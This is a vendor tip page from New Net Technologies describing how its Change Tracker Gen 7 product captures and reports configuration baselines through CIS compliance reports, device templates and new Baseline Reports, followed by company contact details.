Understanding what the correct baseline configuration is for your IT system components is a keystone of security best practice. Compliance mandates, in particular, NERC CIP, require baselines of installed software, updates, and open ports to be captured and reported against.

Determining the optimum configuration state for an IT device will comprise both its:

Functional Requirements (Which applications does this system support? Which software packages does it need? What does the filesystem structure look like? What are the configuration settings needed for it to deliver its services?)

and its:

Security Posture (What is the hardened build for this system? What are the minimum services, ports, and functions required, and what can we disable as a result? What are the configuration settings needed to mitigate vulnerabilities known to affect this device?)

Change Tracker Gen 7 automates both functions using built-in templates and audit reports, combined with an intelligent discovery process to assign these to devices.

Each device resides within a group and each group has a range of Device Configuration Templates and Scheduled Reports (See previous Top Tip ‘Functional Specific Group – Inherited Monitoring and Reporting Templates’

 

 

The Compliance Report conveys one definition of a baseline. We typically use CIS Benchmark reports to assess whether a device is within compliance of their Secure Configuration best practice, so the report itself encapsulates what the ideal configuration looks like from the point of view of security and scores the device against this. In other words, the baseline defined in the Compliance Report is pre-defined and ‘hard wired’ (although any rules and settings within the report can be edited or added to fit your own hardened build standard – talk to This email address is being protected from spambots. You need JavaScript enabled to view it. for guidance)

By contrast the Device Configuration Template establishes a baseline dynamically by taking a snapshot of the device configuration when enabled. This baseline can comprise any mixture of file attributes/file hash values, Windows registry and security policy settings, installed software and updates, service and process lists, config file contents, user accounts and open port lists.

For direct host monitoring where an agent is being used, this baseline of initial states is held locally by the NNT Agent and is used to evaluate and report changes as they occur. For agentless monitoring, the baselines are held by the NNT Proxy Agent. In both instances, storing the baseline local to the monitoring agent distributes processing and storage resources and maximizes performance by performing differencing locally. In the case of the direct host monitoring agent, this also allows Live Tracking of changes for real-time detection.

This means that the baseline in this scenario is a point-in-time starting state for a device, with any drift over time recorded step-by-step as a sequence of change events.

New Baseline Reports – Centralized collation of Baseline states

With Change Tracker Gen 7 and the new Gen 7 Agent, a third baseline perspective is now available, providing a hybrid of the two baseline options described previously.

Now any device being monitored can have its current configured state captured and used to dynamically generate a Baseline Report. The Baseline Report is of huge value because:

-          Can be used as a ‘hard copy’ record of a device baseline state

-          Can be used as a ‘Gold Standard’ baseline from which any configuration drift over time for the device can be exposed

-          Can be used to determine configuration differences between a ‘Gold Standard’ device and other similar devices

Any tracker or trackers specified in a Device Configuration Template can be enabled to issue Baseline Events. Just check the ‘Send Baseline Events’ box as below

 

 

Once enabled, this will allow a Baseline Report to be generated for the device for any tracker or mixture of trackers.

 

Running a Baseline Report

Using Baseline Reports is then a simple case of running the report either Ad Hoc or Scheduled just like any other Compliance Report with results sortable by Pass/Fail as usual.

 

And you can use the Compare Results function to see exactly what has changed from one report result to another-

 

 

 

 

NNT has a range of training and managed service offerings to help you get the most of your solution.
Call 1-888-898-0674 or click here to request more information.

NNT Products
USA Offices
New Net Technologies Ltd
Naples
Suite #10115, 9128 Strada Place
Naples, Florida, 34108
Atlanta
201 17th Street, Suite 300
Atlanta, Georgia, 30363.

Tel: 1-888-898-0674
email[email protected]
UK Office
New Net Technologies Ltd
Spectrum House, Dunstable Road
Redbourn,
St Albans

Herts
AL3 7PR

Tel: 08456 585 005
Fax: 08456 122 031
email[email protected]
NNT Newsletter
Sign up to receive our monthly newsletter covering breaking security news, how-to-tips, trends and commentary directly to your inbox.


Google+ Linkedin Twitter - Change Tracker Facebook rss feed YouTube
CIS benchmarking SEWP Cybersecurity 500 Sans Institute
Copyright 2017, New Net Technologies Ltd. All rights reserved. 
NNT and Change Tracker are registered trademarks of New Net Technologies Ltd.
All other product, company names and trademarks are the property of their respective owners.